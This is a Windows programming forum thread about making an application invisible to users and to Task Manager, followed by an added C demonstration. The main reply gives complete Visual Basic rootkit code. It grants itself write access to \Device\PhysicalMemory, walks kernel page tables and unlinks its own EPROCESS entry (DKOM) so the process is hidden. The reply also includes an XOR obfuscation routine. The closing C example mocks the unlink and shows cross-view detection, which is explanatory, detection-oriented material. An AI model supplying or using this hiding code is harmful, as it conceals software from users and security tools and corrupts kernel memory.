yomgui75 (7 posts, registered Tuesday 19 April 2005, Member, last post 25 April 2005)
19 April 2005 at 22:51
Last reply: blooddity (1 post, registered Monday 8 May 2006, Member, last post 1 May 2008)
1 May 2008 at 05:42
Hi all,
I'm looking for a way to start a Windows application as soon as a session is opened (a priori no problem by putting it in the Start menu), and above all to hide it from the user for the whole duration of the session.
The application in question should appear neither in the Windows taskbar nor in the main Windows window... Ideally, it wouldn't appear in the Task Manager either.
I searched on the internet; there are freewares that do this... They're a sort of anti-panic device...
A priori it should be doable with VB, using the APIs I think... but since I don't know much about it, I'm asking my question on the forum just in case.
Thanks in advance to all the great developers who will look into this question.
See you
crenaud76 (4172 posts, registered Wednesday 30 July 2003, Member, last post 9 June 2006) 28
20 April 2005 at 09:27
As far as I know it is impossible to completely hide a process (among other places, from the Task Manager). If it were possible, I think the little jerks who write viruses would have used this technique a long time ago, which is not the case, as far as I know.
And anyway, what's the point of hiding your app from the Task Manager? You want to make a virus... If so, you know what I think of you...
yomgui75 (7 posts, registered Tuesday 19 April 2005, Member, last post 25 April 2005)
20 April 2005 at 09:40
I understand that the question may raise that kind of concern.
First of all, to put things in context, I'm not a developer... so I'm miles away from wanting to create a virus.
Next, to explain the reason for my request, here is the situation:
I have a product that is split into a thick client (the application) and a web part... The web part is so specific that it calls functions on the user's machine.
Problem: the website doesn't work unless the thick client is running on the machines. But the thick client allows doing certain things we don't want users to have access to...
The idea was therefore to run the thick client in the background (a bit like a service) that the user won't go and kill because he doesn't know what it is!
That's the reason for my question.
A priori I've found a lead on this site...
A piece of code by Jeff007 that lets you hide apps at launch:
<<
Option Explicit

' Launcher: runs the program named on its own command line with the window hidden.
' Usage: launcher.exe "C:\path\to\client.exe"
Sub Main()
    On Error Resume Next
    Dim dummy As Double
    ' Command$ is this launcher's command line; vbHide starts the child with
    ' SW_HIDE as its initial window state. A program that shows its own windows
    ' explicitly will still appear, and nothing here hides it from Task Manager.
    dummy = Shell(Command$, vbHide)
    End
End Sub
>>
However, I don't know how to compile it... because I really don't know VB
elguevel (718 posts, registered Thursday 19 December 2002, Member, last post 22 November 2016) 3
6 Oct. 2005 at 10:08
To answer crenaud76: yes, you can hide processes from the Task Manager, and yes, virus writers already use this technique!!! (I've already seen it)
Option Explicit

' Hides the calling process from the kernel's active-process list (direct kernel
' object manipulation, DKOM) by writing to kernel memory through the
' \Device\PhysicalMemory section.
' Scope of this code as written: 32-bit Windows 2000 (5.0) and XP (5.1) without PAE,
' run as Administrator. Every offset below (KPCR, KTHREAD, EPROCESS, page-directory
' base) is hard-coded for those builds; on any other build the writes land in the
' wrong place. User-mode access to \Device\PhysicalMemory was removed from Windows
' Server 2003 SP1 onward, so the open fails there.

' ---- NT / Win32 types -------------------------------------------------------
Private Type OBJECT_ATTRIBUTES
    Length As Long
    RootDirectory As Long
    ObjectName As Long                  ' pointer to a UNICODE_STRING
    Attributes As Long
    SecurityDescriptor As Long
    SecurityQualityOfService As Long
End Type

Private Type UNICODE_STRING
    Length As Integer
    MaximumLength As Integer
    Buffer As Long
End Type

Private Type ACL
    AclRevision As Byte
    Sbz1 As Byte
    AclSize As Integer
    AceCount As Integer
    Sbz2 As Integer
End Type

Private Enum SE_OBJECT_TYPE
    SE_UNKNOWN_OBJECT_TYPE = 0
    SE_FILE_OBJECT
    SE_SERVICE
    SE_PRINTER
    SE_REGISTRY_KEY
    SE_LMSHARE
    SE_KERNEL_OBJECT                    ' = 6: sections, events, mutexes, ...
End Enum

Private Enum ACCESS_MODE
    NOT_USED_ACCESS = 0
    GRANT_ACCESS
    SET_ACCESS
    DENY_ACCESS
    REVOKE_ACCESS
End Enum

Private Enum MULTIPLE_TRUSTEE_OPERATION
    NO_MULTIPLE_TRUSTEE
    TRUSTEE_IS_IMPERSONATE
End Enum

Private Enum TRUSTEE_FORM
    TRUSTEE_IS_SID
    TRUSTEE_IS_NAME
End Enum

Private Enum TRUSTEE_TYPE
    TRUSTEE_IS_UNKNOWN
    TRUSTEE_IS_USER
    TRUSTEE_IS_GROUP
End Enum

Private Type TRUSTEE
    pMultipleTrustee As Long
    MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
    TrusteeForm As TRUSTEE_FORM
    TrusteeType As TRUSTEE_TYPE
    ptstrName As String
End Type

Private Type EXPLICIT_ACCESS
    grfAccessPermissions As Long
    grfAccessMode As ACCESS_MODE
    grfInheritance As Long
    TRUSTEE As TRUSTEE
End Type

Private Type OSVERSIONINFO
    dwOSVersionInfoSize As Long
    dwMajorVersion As Long
    dwMinorVersion As Long
    dwBuildNumber As Long
    dwPlatformId As Long
    szCSDVersion As String * 128
End Type

' ---- constants --------------------------------------------------------------
Private Const SECTION_MAP_WRITE As Long = &H2
Private Const SECTION_MAP_READ As Long = &H4
Private Const FILE_MAP_WRITE As Long = &H2
Private Const FILE_MAP_READ As Long = &H4
Private Const READ_CONTROL As Long = &H20000
Private Const WRITE_DAC As Long = &H40000
Private Const STATUS_ACCESS_DENIED As Long = &HC0000022
Private Const DACL_SECURITY_INFORMATION As Long = &H4
Private Const NO_INHERITANCE As Long = 0
Private Const OBJ_CASE_INSENSITIVE As Long = &H40
Private Const ERROR_SUCCESS As Long = 0
Private Const VER_PLATFORM_WIN32_NT As Long = 2

' ---- API declarations -------------------------------------------------------
Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ByVal psidOwner As Long, ByVal psidGroup As Long, ByVal pDacl As Long, ByVal pSacl As Long) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ByVal ppsidOwner As Long, ByVal ppsidGroup As Long, ppDacl As Long, ByVal ppSacl As Long, ppSecurityDescriptor As Long) As Long
Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)
Private Declare Sub RtlInitUnicodeString Lib "ntdll.dll" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "ntdll.dll" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As OBJECT_ATTRIBUTES) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
' lpBaseAddress must be ByVal: declared ByRef "As Any", the calls below passed the
' address of the VB variable instead of the mapped base and nothing was ever unmapped.
Private Declare Function UnmapViewOfFile Lib "kernel32" (ByVal lpBaseAddress As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long

Private verinfo As OSVERSIONINFO
Private g_hMPM As Long                  ' handle to the \Device\PhysicalMemory section
Private g_pMapPhysicalMemory As Long    ' read-only view of the kernel page directory
Private aByte(3) As Byte

' Hide the current application's process from the process list
Public Sub HideCurrentProcess()
    Dim thread As Long, process As Long, fw As Long, bw As Long
    Dim lOffsetFlink As Long, lOffsetBlink As Long

    ' EPROCESS.ActiveProcessLinks offsets differ per kernel build.
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If GetVersionEx(verinfo) <> 0 Then
        If verinfo.dwPlatformId = VER_PLATFORM_WIN32_NT Then
            If verinfo.dwMajorVersion = 5 Then
                Select Case verinfo.dwMinorVersion
                Case 0                              ' Windows 2000
                    lOffsetFlink = &HA0
                    lOffsetBlink = &HA4
                Case 1                              ' Windows XP
                    lOffsetFlink = &H88
                    lOffsetBlink = &H8C
                End Select
            End If
        End If
    End If
    ' Unknown kernel: refuse rather than write through zero offsets.
    If lOffsetFlink = 0 Then Exit Sub

    If OpenPhysicalMemory() <> 0 Then
        ' The KPCR sits at 0xFFDFF000; +0x124 is KPRCB.CurrentThread.
        thread = GetData(&HFFDFF124)
        ' KTHREAD.ApcState.Process (+0x44) is the owning EPROCESS, i.e. ourselves.
        process = GetData(thread + &H44)
        fw = GetData(process + lOffsetFlink)        ' next entry in the list
        bw = GetData(process + lOffsetBlink)        ' previous entry
        SetData fw + 4, bw                          ' next->Blink = prev
        SetData bw, fw                              ' prev->Flink = next
        ' Our own Flink/Blink are left pointing at the old neighbours, so the
        ' kernel's RemoveEntryList at exit still writes to live entries,
        ' unless one of those neighbours has exited in the meantime.
        UnmapViewOfFile g_pMapPhysicalMemory
        CloseHandle g_hMPM
    End If
End Sub

' Grant the current user SECTION_MAP_WRITE on the section by adding an ACE to its
' DACL. Needs a handle opened with WRITE_DAC, which Administrators hold by default.
Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
    Dim pDacl As Long, pNewDacl As Long, pSD As Long, dwRes As Long
    Dim ea As EXPLICIT_ACCESS

    dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD)
    If dwRes <> ERROR_SUCCESS Then GoTo Cleanup
    ' "CURRENT_USER" is the special trustee name meaning the caller's own account.
    BuildExplicitAccessWithName ea, "CURRENT_USER", SECTION_MAP_WRITE, GRANT_ACCESS, NO_INHERITANCE
    dwRes = SetEntriesInAcl(1, ea, pDacl, pNewDacl)
    If dwRes <> ERROR_SUCCESS Then GoTo Cleanup
    dwRes = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pNewDacl, 0)
Cleanup:
    If pSD <> 0 Then LocalFree pSD
    If pNewDacl <> 0 Then LocalFree pNewDacl
End Sub

' Open \Device\PhysicalMemory read/write and map the page directory through it.
' Returns the section handle, or 0 on failure.
Private Function OpenPhysicalMemory() As Long
    Dim Status As Long, lDirectory As Long
    Dim sName As String
    Dim PhysmemString As UNICODE_STRING
    Dim Attributes As OBJECT_ATTRIBUTES

    sName = "\Device\PhysicalMemory"
    RtlInitUnicodeString PhysmemString, StrPtr(sName)
    Attributes.Length = Len(Attributes)
    Attributes.ObjectName = VarPtr(PhysmemString)
    Attributes.Attributes = OBJ_CASE_INSENSITIVE

    Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
    If Status = STATUS_ACCESS_DENIED Then
        ' Nobody has write access by default: reopen with WRITE_DAC, add an ACE, retry.
        Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
        If Status <> 0 Then Exit Function
        SetPhyscialMemorySectionCanBeWrited g_hMPM
        CloseHandle g_hMPM
        Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
    End If
    If Status <> 0 Then Exit Function

    ' Physical address of the kernel page directory (non-PAE): 0x30000 on
    ' Windows 2000, 0x39000 on Windows XP.
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If GetVersionEx(verinfo) <> 0 Then
        If verinfo.dwPlatformId = VER_PLATFORM_WIN32_NT Then
            If verinfo.dwMajorVersion = 5 Then
                Select Case verinfo.dwMinorVersion
                Case 0
                    lDirectory = &H30000
                Case 1
                    lDirectory = &H39000
                End Select
            End If
        End If
    End If
    If lDirectory = 0 Then
        CloseHandle g_hMPM
        g_hMPM = 0
        Exit Function
    End If

    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, lDirectory, &H1000)
    If g_pMapPhysicalMemory <> 0 Then
        OpenPhysicalMemory = g_hMPM
    Else
        CloseHandle g_hMPM
        g_hMPM = 0
    End If
End Function

' Translate a kernel virtual address to a physical one by walking the 32-bit
' non-PAE page tables by hand: page directory -> page table -> page.
' BaseAddress is the mapped view of the page directory. Returns 0 if not present.
Private Function LinearToPhys(ByVal BaseAddress As Long, ByVal addr As Long) As Long
    Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
    Dim lTemp As Long

    VAddr = addr
    ' PDE index = top 10 bits. Go through a Double so that kernel addresses
    ' (bit 31 set, negative as a VB Long) are treated as unsigned.
    CopyMemory aByte(0), VAddr, 4
    lTemp = Int(ByteArrToLong(aByte) / (2 ^ 22))
    PGDE = BaseAddress + lTemp * 4
    CopyMemory PGDE, ByVal PGDE, 4                  ' read the page-directory entry
    If (PGDE And 1) <> 0 Then                       ' present bit
        If (PGDE And &H80) <> 0 Then                ' PS bit: 4 MB page, no page table
            PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
        Else
            ' Map the page table the PDE points at and read the PTE for this page.
            PGDE = MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, PGDE And &HFFFFF000, &H1000)
            If PGDE <> 0 Then
                lTemp = (VAddr And &H3FF000) \ &H1000
                PTE = PGDE + lTemp * 4
                CopyMemory PTE, ByVal PTE, 4
                If (PTE And 1) <> 0 Then
                    PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
                End If
                UnmapViewOfFile PGDE
            End If
        End If
    End If
    LinearToPhys = PAddr
End Function

' Read a 32-bit value at a kernel virtual address by mapping its physical page.
Private Function GetData(ByVal addr As Long) As Long
    Dim phys As Long, tmp As Long, Ret As Long
    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    If phys = 0 Then Exit Function
    tmp = MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
        CopyMemory Ret, ByVal (tmp + (phys And &HFFF)), 4
        UnmapViewOfFile tmp
        GetData = Ret
    End If
End Function

' Write a 32-bit value at a kernel virtual address through a writable mapping.
Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
    Dim phys As Long, tmp As Long
    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    If phys = 0 Then Exit Function
    tmp = MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
        CopyMemory ByVal (tmp + (phys And &HFFF)), data, 4
        UnmapViewOfFile tmp
        SetData = True
    End If
End Function

' Little-endian 4 bytes -> unsigned value (as a Double, since Long is signed).
Private Function ByteArrToLong(inByte() As Byte) As Double
    Dim i As Integer
    For i = 0 To 3
        ByteArrToLong = ByteArrToLong + inByte(i) * (&H100 ^ i)
    Next i
End Function

' Simple XOR obfuscation with a rolling 1..255 key; symmetric, so calling it
' twice returns the original string.
Public Function encdec(ByVal inputString As String) As String
    Dim i As Long, g As Long, tempstr As String
    If Len(inputString) = 0 Then Exit Function
    g = 1
    For i = 1 To Len(inputString)
        tempstr = tempstr & Chr$(Asc(Mid$(inputString, i, 1)) Xor g)
        If g = 255 Then g = 1 Else g = g + 1
    Next i
    encdec = tempstr
End Function
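The list surgery that elguevel's HideCurrentProcess performs with its two SetData calls, together with the cross-view check that still catches it, as an added example in C that is not part of the thread. It runs on a constructed user-mode mock of the kernel's EPROCESS list rather than on real kernel memory, so it builds and runs anywhere; the cut-down EPROCESS, the PID table, the PIDs and the image names are assumptions made for the demo.

```c
/* Added example, not from the forum post: DKOM unlink of an EPROCESS from the
 * active-process list, reproduced on constructed user-mode data, plus the
 * cross-view detection that exposes it. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Same layout as the kernel's LIST_ENTRY. */
typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY;

/* Cut-down EPROCESS (assumption for the demo) holding only the fields the VB
 * code reaches: the PID (lOffsetPID) and ActiveProcessLinks (lOffsetFlink/Blink). */
typedef struct {
    unsigned long UniqueProcessId;
    LIST_ENTRY    ActiveProcessLinks;
    char          ImageFileName[16];
} EPROCESS;

#define MAX_PROCS 8
static EPROCESS   pool[MAX_PROCS];      /* stands in for the kernel's PID table */
static int        npool;
static LIST_ENTRY PsActiveProcessHead;  /* the list Task Manager is built from */

static void reset_kernel(void)
{
    npool = 0;
    memset(pool, 0, sizeof pool);
    PsActiveProcessHead.Flink = &PsActiveProcessHead;
    PsActiveProcessHead.Blink = &PsActiveProcessHead;
}

/* Create a process and append it to the active list (tail insert, like InsertTailList). */
static EPROCESS *create_process(unsigned long pid, const char *name)
{
    EPROCESS *p;
    LIST_ENTRY *e;
    if (npool >= MAX_PROCS) return NULL;
    p = &pool[npool++];
    e = &p->ActiveProcessLinks;
    p->UniqueProcessId = pid;
    strncpy(p->ImageFileName, name, sizeof p->ImageFileName - 1);
    e->Flink = &PsActiveProcessHead;
    e->Blink = PsActiveProcessHead.Blink;
    PsActiveProcessHead.Blink->Flink = e;
    PsActiveProcessHead.Blink = e;
    return p;
}

/* The two stores from HideCurrentProcess:
 *     SetData fw + 4, bw   ->  fw->Blink = bw
 *     SetData bw, fw       ->  bw->Flink = fw
 * The victim's own Flink/Blink are left pointing at its old neighbours. */
static void dkom_unlink(EPROCESS *p)
{
    LIST_ENTRY *fw = p->ActiveProcessLinks.Flink;
    LIST_ENTRY *bw = p->ActiveProcessLinks.Blink;
    fw->Blink = bw;
    bw->Flink = fw;
}

/* View 1: walk PsActiveProcessHead, which is what NtQuerySystemInformation and
 * therefore Task Manager, tasklist and EnumProcesses report. Returns the count. */
static int view_active_list(unsigned long *pids, int max)
{
    int n = 0;
    LIST_ENTRY *e;
    for (e = PsActiveProcessHead.Flink; e != &PsActiveProcessHead && n < max; e = e->Flink) {
        EPROCESS *p = (EPROCESS *)((char *)e - offsetof(EPROCESS, ActiveProcessLinks));
        pids[n++] = p->UniqueProcessId;
    }
    return n;
}

/* View 2: enumerate by PID, the way an OpenProcess brute force over every
 * candidate PID does. Unlinking never touched this table. */
static int view_pid_table(unsigned long *pids, int max)
{
    int i, n = 0;
    for (i = 0; i < npool && n < max; i++)
        pids[n++] = pool[i].UniqueProcessId;
    return n;
}

/* Cross-view diff: anything in view 2 but not in view 1 has been unlinked. */
static int find_hidden(unsigned long *hidden, int max)
{
    unsigned long listed[MAX_PROCS], all[MAX_PROCS];
    int nl = view_active_list(listed, MAX_PROCS);
    int na = view_pid_table(all, MAX_PROCS);
    int i, j, nh = 0;
    for (i = 0; i < na && nh < max; i++) {
        int seen = 0;
        for (j = 0; j < nl; j++) if (listed[j] == all[i]) { seen = 1; break; }
        if (!seen) hidden[nh++] = all[i];
    }
    return nh;
}

/* Constructed scenario: four processes, the thick client hides itself.
 * Returns how many hidden processes the diff finds and stores their PIDs. */
static int run_scenario(unsigned long *hidden, int max)
{
    EPROCESS *me;
    reset_kernel();
    create_process(4,    "System");
    create_process(620,  "csrss.exe");
    me = create_process(1234, "client.exe");
    create_process(1500, "explorer.exe");
    dkom_unlink(me);
    return find_hidden(hidden, max);
}

int main(void)
{
    unsigned long hidden[MAX_PROCS], listed[MAX_PROCS];
    int i, nh = run_scenario(hidden, MAX_PROCS);
    int nl = view_active_list(listed, MAX_PROCS);
    printf("active list shows %d processes; cross-view found %d hidden", nl, nh);
    for (i = 0; i < nh; i++) printf(" (pid %lu)", hidden[i]);
    printf("\n");
    return 0;
}
```

The process disappears from the first view only because that is the list the process-enumeration APIs walk; the scheduler runs threads from its own queues, so the hidden process keeps executing. That asymmetry is what the PID brute-force and other cross-view checks in rootkit detectors rely on: anything reachable by PID or by handle but absent from the list was unlinked.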